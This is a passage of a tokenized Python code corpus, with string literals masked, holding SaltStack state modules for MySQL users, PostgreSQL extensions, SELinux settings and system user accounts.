is_true ( allow_passwordless ) : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> if __salt__ [ '<STR_LIT>' ] ( name , host , <EOL> password , password_hash , <EOL> allow_passwordless , unix_socket = unix_socket , password_column = password_column , <EOL> ** connection_args ) : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , host ) <EOL> if passwordless : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' <EOL> ret [ '<STR_LIT>' ] [ name ] = '<STR_LIT>' <EOL> else : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , host ) <EOL> err = _get_mysql_error ( ) <EOL> if err is not None : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' . format ( err ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> def absent ( name , <EOL> host = '<STR_LIT:localhost>' , <EOL> ** connection_args ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> if __salt__ [ '<STR_LIT>' ] ( name , host , ** connection_args ) : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( <EOL> name , <EOL> host ) <EOL> return ret <EOL> if __salt__ [ '<STR_LIT>' ] ( name , host , ** connection_args ) : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , host ) <EOL> ret [ '<STR_LIT>' ] [ name ] = '<STR_LIT>' <EOL> return ret <EOL> else : <EOL> err = _get_mysql_error ( ) <EOL> if err is not None : <EOL> ret [ '<STR_LIT>' ] = err <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> else : <EOL> err = _get_mysql_error ( ) <EOL> if err is not None : <EOL> ret [ '<STR_LIT>' ] = err <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> ret [ '<STR_LIT>' ] = ( <EOL> '<STR_LIT>' <EOL> ) . format ( name , host ) <EOL> return ret </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import logging <EOL> from salt . modules import postgres <EOL> log = logging . getLogger ( __name__ ) <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> return '<STR_LIT>' in __salt__ <EOL> def present ( name , <EOL> if_not_exists = None , <EOL> schema = None , <EOL> ext_version = None , <EOL> from_version = None , <EOL> user = None , <EOL> maintenance_db = None , <EOL> db_password = None , <EOL> db_host = None , <EOL> db_port = None , <EOL> db_user = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' . format ( name ) } <EOL> db_args = { <EOL> '<STR_LIT>' : maintenance_db , <EOL> '<STR_LIT>' : user , <EOL> '<STR_LIT:host>' : db_host , <EOL> '<STR_LIT:user>' : db_user , <EOL> '<STR_LIT:port>' : db_port , <EOL> '<STR_LIT:password>' : db_password , <EOL> } <EOL> mode = '<STR_LIT>' <EOL> mtdata = __salt__ [ '<STR_LIT>' ] ( <EOL> name , <EOL> schema = schema , <EOL> ext_version = ext_version , <EOL> ** db_args ) <EOL> toinstall = postgres . _EXTENSION_NOT_INSTALLED in mtdata <EOL> if toinstall : <EOL> mode = '<STR_LIT>' <EOL> toupgrade = False <EOL> if postgres . _EXTENSION_INSTALLED in mtdata : <EOL> for flag in [ <EOL> postgres . _EXTENSION_TO_MOVE , <EOL> postgres . _EXTENSION_TO_UPGRADE <EOL> ] : <EOL> if flag in mtdata : <EOL> toupgrade = True <EOL> mode = '<STR_LIT>' <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> if mode : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( <EOL> name , mode ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return ret <EOL> cret = None <EOL> if toinstall or toupgrade : <EOL> cret = __salt__ [ '<STR_LIT>' ] ( <EOL> name = name , <EOL> if_not_exists = if_not_exists , <EOL> schema = schema , <EOL> ext_version = ext_version , <EOL> from_version = from_version , <EOL> ** db_args ) <EOL> if cret : <EOL> if mode . 
endswith ( '<STR_LIT:e>' ) : <EOL> suffix = '<STR_LIT:d>' <EOL> else : <EOL> suffix = '<STR_LIT>' <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , mode , suffix ) <EOL> elif cret is not None : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , mode ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> else : <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> return ret <EOL> def absent ( name , <EOL> if_exists = None , <EOL> restrict = None , <EOL> cascade = None , <EOL> user = None , <EOL> maintenance_db = None , <EOL> db_password = None , <EOL> db_host = None , <EOL> db_port = None , <EOL> db_user = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> db_args = { <EOL> '<STR_LIT>' : maintenance_db , <EOL> '<STR_LIT>' : user , <EOL> '<STR_LIT:host>' : db_host , <EOL> '<STR_LIT:user>' : db_user , <EOL> '<STR_LIT:port>' : db_port , <EOL> '<STR_LIT:password>' : db_password , <EOL> } <EOL> exists = __salt__ [ '<STR_LIT>' ] ( name , ** db_args ) <EOL> if exists : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> if __salt__ [ '<STR_LIT>' ] ( name , <EOL> if_exists = if_exists , <EOL> restrict = restrict , <EOL> cascade = cascade , <EOL> ** db_args ) : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> ret [ '<STR_LIT>' ] [ name ] = '<STR_LIT>' <EOL> return ret <EOL> else : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> else : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' . format ( name ) <EOL> return ret </s>
<s> '''<STR_LIT>''' <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> return '<STR_LIT>' if '<STR_LIT>' in __salt__ else False <EOL> def _refine_mode ( mode ) : <EOL> '''<STR_LIT>''' <EOL> mode = str ( mode ) . lower ( ) <EOL> if any ( [ mode . startswith ( '<STR_LIT:e>' ) , <EOL> mode == '<STR_LIT:1>' , <EOL> mode == '<STR_LIT>' ] ) : <EOL> return '<STR_LIT>' <EOL> if any ( [ mode . startswith ( '<STR_LIT:p>' ) , <EOL> mode == '<STR_LIT:0>' , <EOL> mode == '<STR_LIT>' ] ) : <EOL> return '<STR_LIT>' <EOL> if any ( [ mode . startswith ( '<STR_LIT:d>' ) ] ) : <EOL> return '<STR_LIT>' <EOL> return '<STR_LIT>' <EOL> def _refine_value ( value ) : <EOL> '''<STR_LIT>''' <EOL> value = str ( value ) . lower ( ) <EOL> if value in ( '<STR_LIT:1>' , '<STR_LIT>' , '<STR_LIT:yes>' , '<STR_LIT:true>' ) : <EOL> return '<STR_LIT>' <EOL> if value in ( '<STR_LIT:0>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:false>' ) : <EOL> return '<STR_LIT>' <EOL> return None <EOL> def _refine_module_state ( module_state ) : <EOL> '''<STR_LIT>''' <EOL> module_state = str ( module_state ) . lower ( ) <EOL> if module_state in ( '<STR_LIT:1>' , '<STR_LIT>' , '<STR_LIT:yes>' , '<STR_LIT:true>' , '<STR_LIT>' ) : <EOL> return '<STR_LIT>' <EOL> if module_state in ( '<STR_LIT:0>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:false>' , '<STR_LIT>' ) : <EOL> return '<STR_LIT>' <EOL> return '<STR_LIT>' <EOL> def mode ( name ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> tmode = _refine_mode ( name ) <EOL> if tmode == '<STR_LIT>' : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> mode = __salt__ [ '<STR_LIT>' ] ( ) <EOL> if mode == tmode : <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( tmode ) <EOL> return ret <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . 
format ( <EOL> tmode ) <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> return ret <EOL> mode = __salt__ [ '<STR_LIT>' ] ( tmode ) <EOL> if mode == tmode : <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( tmode ) <EOL> return ret <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( tmode ) <EOL> return ret <EOL> def boolean ( name , value , persist = False ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> bools = __salt__ [ '<STR_LIT>' ] ( ) <EOL> if name not in bools : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> rvalue = _refine_value ( value ) <EOL> if rvalue is None : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' . format ( value ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> state = bools [ name ] [ '<STR_LIT>' ] == rvalue <EOL> default = bools [ name ] [ '<STR_LIT>' ] == rvalue <EOL> if persist : <EOL> if state and default : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return ret <EOL> else : <EOL> if state : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return ret <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( <EOL> name , rvalue ) <EOL> return ret <EOL> if __salt__ [ '<STR_LIT>' ] ( name , rvalue , persist ) : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , rvalue ) <EOL> return ret <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , rvalue ) <EOL> return ret <EOL> def module ( name , module_state = '<STR_LIT>' , version = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> modules = __salt__ [ '<STR_LIT>' ] ( ) <EOL> if name not in modules : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . 
format ( name ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> rmodule_state = _refine_module_state ( module_state ) <EOL> if rmodule_state == '<STR_LIT>' : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' . format ( module_state , module ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> if version != '<STR_LIT>' : <EOL> installed_version = modules [ name ] [ '<STR_LIT>' ] <EOL> if not installed_version == version : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' . format ( installed_version , version ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> current_module_state = _refine_module_state ( modules [ name ] [ '<STR_LIT>' ] ) <EOL> if rmodule_state == current_module_state : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( <EOL> name , module_state ) <EOL> return ret <EOL> if __salt__ [ '<STR_LIT>' ] ( name , rmodule_state ) : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , module_state ) <EOL> return ret <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , module_state ) <EOL> return ret </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import os <EOL> import logging <EOL> import salt . utils <EOL> from salt . utils . locales import sdecode , sdecode_if_string <EOL> from salt . ext . six import string_types , iteritems <EOL> log = logging . getLogger ( __name__ ) <EOL> def _group_changes ( cur , wanted , remove = False ) : <EOL> '''<STR_LIT>''' <EOL> old = set ( cur ) <EOL> new = set ( wanted ) <EOL> if ( remove and old != new ) or ( not remove and not new . issubset ( old ) ) : <EOL> return True <EOL> return False <EOL> def _changes ( name , <EOL> uid = None , <EOL> gid = None , <EOL> groups = None , <EOL> optional_groups = None , <EOL> remove_groups = True , <EOL> home = None , <EOL> createhome = True , <EOL> password = None , <EOL> enforce_password = True , <EOL> empty_password = False , <EOL> shell = None , <EOL> fullname = '<STR_LIT>' , <EOL> roomnumber = '<STR_LIT>' , <EOL> workphone = '<STR_LIT>' , <EOL> homephone = '<STR_LIT>' , <EOL> loginclass = None , <EOL> date = <NUM_LIT:0> , <EOL> mindays = <NUM_LIT:0> , <EOL> maxdays = <NUM_LIT> , <EOL> inactdays = <NUM_LIT:0> , <EOL> warndays = <NUM_LIT:7> , <EOL> expire = None , <EOL> win_homedrive = None , <EOL> win_profile = None , <EOL> win_logonscript = None , <EOL> win_description = None ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in __salt__ : <EOL> lshad = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> lusr = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if not lusr : <EOL> return False <EOL> change = { } <EOL> if groups is None : <EOL> groups = lusr [ '<STR_LIT>' ] <EOL> wanted_groups = sorted ( set ( ( groups or [ ] ) + ( optional_groups or [ ] ) ) ) <EOL> if uid and lusr [ '<STR_LIT>' ] != uid : <EOL> change [ '<STR_LIT>' ] = uid <EOL> if gid is not None and lusr [ '<STR_LIT>' ] not in ( gid , __salt__ [ '<STR_LIT>' ] ( gid ) ) : <EOL> change [ '<STR_LIT>' ] = gid <EOL> default_grp = __salt__ [ '<STR_LIT>' ] ( <EOL> gid if gid is not None else lusr [ '<STR_LIT>' ] <EOL> ) <EOL> 
if default_grp in lusr [ '<STR_LIT>' ] : <EOL> lusr [ '<STR_LIT>' ] . remove ( default_grp ) <EOL> if name in lusr [ '<STR_LIT>' ] and name not in wanted_groups : <EOL> lusr [ '<STR_LIT>' ] . remove ( name ) <EOL> if default_grp in wanted_groups : <EOL> wanted_groups . remove ( default_grp ) <EOL> if _group_changes ( lusr [ '<STR_LIT>' ] , wanted_groups , remove_groups ) : <EOL> change [ '<STR_LIT>' ] = wanted_groups <EOL> if home and lusr [ '<STR_LIT>' ] != home : <EOL> change [ '<STR_LIT>' ] = home <EOL> if createhome : <EOL> newhome = home if home else lusr [ '<STR_LIT>' ] <EOL> if newhome is not None and not os . path . isdir ( newhome ) : <EOL> change [ '<STR_LIT>' ] = newhome <EOL> if shell and lusr [ '<STR_LIT>' ] != shell : <EOL> change [ '<STR_LIT>' ] = shell <EOL> if '<STR_LIT>' in __salt__ and '<STR_LIT>' in __salt__ : <EOL> if password : <EOL> default_hash = __salt__ [ '<STR_LIT>' ] ( ) <EOL> if lshad [ '<STR_LIT>' ] == default_hash or lshad [ '<STR_LIT>' ] != default_hash and enforce_password : <EOL> if lshad [ '<STR_LIT>' ] != password : <EOL> change [ '<STR_LIT>' ] = password <EOL> if date and date is not <NUM_LIT:0> and lshad [ '<STR_LIT>' ] != date : <EOL> change [ '<STR_LIT:date>' ] = date <EOL> if mindays and mindays is not <NUM_LIT:0> and lshad [ '<STR_LIT>' ] != mindays : <EOL> change [ '<STR_LIT>' ] = mindays <EOL> if maxdays and maxdays is not <NUM_LIT> and lshad [ '<STR_LIT>' ] != maxdays : <EOL> change [ '<STR_LIT>' ] = maxdays <EOL> if inactdays and inactdays is not <NUM_LIT:0> and lshad [ '<STR_LIT>' ] != inactdays : <EOL> change [ '<STR_LIT>' ] = inactdays <EOL> if warndays and warndays is not <NUM_LIT:7> and lshad [ '<STR_LIT>' ] != warndays : <EOL> change [ '<STR_LIT>' ] = warndays <EOL> if expire and lshad [ '<STR_LIT>' ] != expire : <EOL> change [ '<STR_LIT>' ] = expire <EOL> elif '<STR_LIT>' in __salt__ and salt . utils . is_windows ( ) : <EOL> if expire and expire is not - <NUM_LIT:1> and salt . utils . 
date_format ( lshad [ '<STR_LIT>' ] ) != salt . utils . date_format ( expire ) : <EOL> change [ '<STR_LIT>' ] = expire <EOL> fullname = sdecode_if_string ( fullname ) <EOL> lusr [ '<STR_LIT>' ] = sdecode_if_string ( lusr [ '<STR_LIT>' ] ) <EOL> if fullname is not None and lusr [ '<STR_LIT>' ] != fullname : <EOL> change [ '<STR_LIT>' ] = fullname <EOL> if win_homedrive and lusr [ '<STR_LIT>' ] != win_homedrive : <EOL> change [ '<STR_LIT>' ] = win_homedrive <EOL> if win_profile and lusr [ '<STR_LIT>' ] != win_profile : <EOL> change [ '<STR_LIT>' ] = win_profile <EOL> if win_logonscript and lusr [ '<STR_LIT>' ] != win_logonscript : <EOL> change [ '<STR_LIT>' ] = win_logonscript <EOL> if win_description and lusr [ '<STR_LIT:description>' ] != win_description : <EOL> change [ '<STR_LIT:description>' ] = win_description <EOL> if '<STR_LIT>' in __salt__ and roomnumber is not None : <EOL> roomnumber = sdecode_if_string ( roomnumber ) <EOL> lusr [ '<STR_LIT>' ] = sdecode_if_string ( lusr [ '<STR_LIT>' ] ) <EOL> if lusr [ '<STR_LIT>' ] != roomnumber : <EOL> change [ '<STR_LIT>' ] = roomnumber <EOL> if '<STR_LIT>' in __salt__ and workphone is not None : <EOL> workphone = sdecode_if_string ( workphone ) <EOL> lusr [ '<STR_LIT>' ] = sdecode_if_string ( lusr [ '<STR_LIT>' ] ) <EOL> if lusr [ '<STR_LIT>' ] != workphone : <EOL> change [ '<STR_LIT>' ] = workphone <EOL> if '<STR_LIT>' in __salt__ and homephone is not None : <EOL> homephone = sdecode_if_string ( homephone ) <EOL> lusr [ '<STR_LIT>' ] = sdecode_if_string ( lusr [ '<STR_LIT>' ] ) <EOL> if lusr [ '<STR_LIT>' ] != homephone : <EOL> change [ '<STR_LIT>' ] = homephone <EOL> if __grains__ [ '<STR_LIT>' ] in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if loginclass : <EOL> if __salt__ [ '<STR_LIT>' ] ( name ) != loginclass : <EOL> change [ '<STR_LIT>' ] = loginclass <EOL> return change <EOL> def present ( name , <EOL> uid = None , <EOL> gid = None , <EOL> gid_from_name = False , <EOL> groups = None , <EOL> optional_groups = None , 
<EOL> remove_groups = True , <EOL> home = None , <EOL> createhome = True , <EOL> password = None , <EOL> hash_password = False , <EOL> enforce_password = True , <EOL> empty_password = False , <EOL> shell = None , <EOL> unique = True , <EOL> system = False , <EOL> fullname = None , <EOL> roomnumber = None , <EOL> workphone = None , <EOL> homephone = None , <EOL> loginclass = None , <EOL> date = None , <EOL> mindays = None , <EOL> maxdays = None , <EOL> inactdays = None , <EOL> warndays = None , <EOL> expire = None , <EOL> win_homedrive = None , <EOL> win_profile = None , <EOL> win_logonscript = None , <EOL> win_description = None ) : <EOL> '''<STR_LIT>''' <EOL> if password and hash_password : <EOL> log . debug ( '<STR_LIT>' ) <EOL> password = __salt__ [ '<STR_LIT>' ] ( password ) <EOL> if fullname is not None : <EOL> fullname = sdecode ( fullname ) <EOL> if roomnumber is not None : <EOL> roomnumber = sdecode ( roomnumber ) <EOL> if workphone is not None : <EOL> workphone = sdecode ( workphone ) <EOL> if homephone is not None : <EOL> homephone = sdecode ( homephone ) <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' . format ( name ) } <EOL> for gecos_field in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if isinstance ( gecos_field , string_types ) and '<STR_LIT:U+002C>' in gecos_field : <EOL> ret [ '<STR_LIT>' ] = "<STR_LIT>" . format ( gecos_field ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> if groups : <EOL> missing_groups = [ x for x in groups if not __salt__ [ '<STR_LIT>' ] ( x ) ] <EOL> if missing_groups : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' . format ( '<STR_LIT:U+002C>' . 
join ( missing_groups ) ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> if optional_groups : <EOL> present_optgroups = [ x for x in optional_groups <EOL> if __salt__ [ '<STR_LIT>' ] ( x ) ] <EOL> for missing_optgroup in [ x for x in optional_groups <EOL> if x not in present_optgroups ] : <EOL> log . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( missing_optgroup , name ) ) <EOL> else : <EOL> present_optgroups = None <EOL> if groups and optional_groups : <EOL> for isected in set ( groups ) . intersection ( optional_groups ) : <EOL> log . warning ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( isected , name ) ) <EOL> if gid_from_name : <EOL> gid = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if empty_password : <EOL> __salt__ [ '<STR_LIT>' ] ( name ) <EOL> changes = _changes ( name , <EOL> uid , <EOL> gid , <EOL> groups , <EOL> present_optgroups , <EOL> remove_groups , <EOL> home , <EOL> createhome , <EOL> password , <EOL> enforce_password , <EOL> empty_password , <EOL> shell , <EOL> fullname , <EOL> roomnumber , <EOL> workphone , <EOL> homephone , <EOL> loginclass , <EOL> date , <EOL> mindays , <EOL> maxdays , <EOL> inactdays , <EOL> warndays , <EOL> expire , <EOL> win_homedrive , <EOL> win_profile , <EOL> win_logonscript , <EOL> win_description ) <EOL> if changes : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> ret [ '<STR_LIT>' ] = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> for key , val in iteritems ( changes ) : <EOL> if key == '<STR_LIT:password>' : <EOL> val = '<STR_LIT>' <EOL> ret [ '<STR_LIT>' ] += u'<STR_LIT>' . 
format ( key , val ) <EOL> return ret <EOL> if '<STR_LIT>' in __salt__ : <EOL> lshad = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if __grains__ [ '<STR_LIT>' ] in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> lcpre = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> pre = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> for key , val in iteritems ( changes ) : <EOL> if key == '<STR_LIT>' and not empty_password : <EOL> __salt__ [ '<STR_LIT>' ] ( name , password ) <EOL> continue <EOL> if key == '<STR_LIT:date>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name , date ) <EOL> continue <EOL> if key == '<STR_LIT>' and '<STR_LIT>' not in changes : <EOL> if __grains__ [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name , val ) <EOL> else : <EOL> __salt__ [ '<STR_LIT>' ] ( name , val , False ) <EOL> continue <EOL> if key == '<STR_LIT>' : <EOL> if __grains__ [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name , val ) <EOL> else : <EOL> __salt__ [ '<STR_LIT>' ] ( name , val , True ) <EOL> if not os . path . 
isdir ( val ) : <EOL> __salt__ [ '<STR_LIT>' ] ( val , pre [ '<STR_LIT>' ] , pre [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> continue <EOL> if key == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name , mindays ) <EOL> continue <EOL> if key == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name , maxdays ) <EOL> continue <EOL> if key == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name , inactdays ) <EOL> continue <EOL> if key == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name , warndays ) <EOL> continue <EOL> if key == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name , expire ) <EOL> continue <EOL> if key == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name = name , homedrive = val ) <EOL> continue <EOL> if key == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name = name , profile = val ) <EOL> continue <EOL> if key == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name = name , logonscript = val ) <EOL> continue <EOL> if key == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name = name , description = val ) <EOL> continue <EOL> if key == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' . format ( key ) ] ( <EOL> name , val , not remove_groups <EOL> ) <EOL> else : <EOL> __salt__ [ '<STR_LIT>' . 
format ( key ) ] ( name , val ) <EOL> post = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> spost = { } <EOL> if '<STR_LIT>' in __salt__ and lshad [ '<STR_LIT>' ] != password : <EOL> spost = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if __grains__ [ '<STR_LIT>' ] in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> lcpost = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> for key in post : <EOL> if post [ key ] != pre [ key ] : <EOL> ret [ '<STR_LIT>' ] [ key ] = post [ key ] <EOL> if '<STR_LIT>' in __salt__ : <EOL> for key in spost : <EOL> if lshad [ key ] != spost [ key ] : <EOL> if key == '<STR_LIT>' : <EOL> ret [ '<STR_LIT>' ] [ key ] = '<STR_LIT>' <EOL> else : <EOL> ret [ '<STR_LIT>' ] [ key ] = spost [ key ] <EOL> if __grains__ [ '<STR_LIT>' ] in ( '<STR_LIT>' , '<STR_LIT>' ) and lcpost != lcpre : <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = lcpost <EOL> if ret [ '<STR_LIT>' ] : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> changes = _changes ( name , <EOL> uid , <EOL> gid , <EOL> groups , <EOL> present_optgroups , <EOL> remove_groups , <EOL> home , <EOL> createhome , <EOL> password , <EOL> enforce_password , <EOL> empty_password , <EOL> shell , <EOL> fullname , <EOL> roomnumber , <EOL> workphone , <EOL> homephone , <EOL> loginclass , <EOL> date , <EOL> mindays , <EOL> maxdays , <EOL> inactdays , <EOL> warndays , <EOL> expire , <EOL> win_homedrive , <EOL> win_profile , <EOL> win_logonscript , <EOL> win_description ) <EOL> if changes : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( <EOL> changes <EOL> ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> if changes is False : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> if groups and present_optgroups : <EOL> groups . extend ( present_optgroups ) <EOL> elif present_optgroups : <EOL> groups = present_optgroups [ : ] <EOL> if not salt . utils . 
is_windows ( ) : <EOL> params = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : uid , <EOL> '<STR_LIT>' : gid , <EOL> '<STR_LIT>' : groups , <EOL> '<STR_LIT>' : home , <EOL> '<STR_LIT>' : shell , <EOL> '<STR_LIT>' : unique , <EOL> '<STR_LIT>' : system , <EOL> '<STR_LIT>' : fullname , <EOL> '<STR_LIT>' : roomnumber , <EOL> '<STR_LIT>' : workphone , <EOL> '<STR_LIT>' : homephone , <EOL> '<STR_LIT>' : createhome , <EOL> '<STR_LIT>' : loginclass } <EOL> else : <EOL> params = ( { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:password>' : password , <EOL> '<STR_LIT>' : fullname , <EOL> '<STR_LIT:description>' : win_description , <EOL> '<STR_LIT>' : groups , <EOL> '<STR_LIT>' : home , <EOL> '<STR_LIT>' : win_homedrive , <EOL> '<STR_LIT>' : win_profile , <EOL> '<STR_LIT>' : win_logonscript } ) <EOL> if __salt__ [ '<STR_LIT>' ] ( ** params ) : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> ret [ '<STR_LIT>' ] = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if not createhome : <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if '<STR_LIT>' in __salt__ and not salt . utils . is_windows ( ) and not salt . utils . is_darwin ( ) : <EOL> if password and not empty_password : <EOL> __salt__ [ '<STR_LIT>' ] ( name , password ) <EOL> spost = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if spost [ '<STR_LIT>' ] != password : <EOL> ret [ '<STR_LIT>' ] = 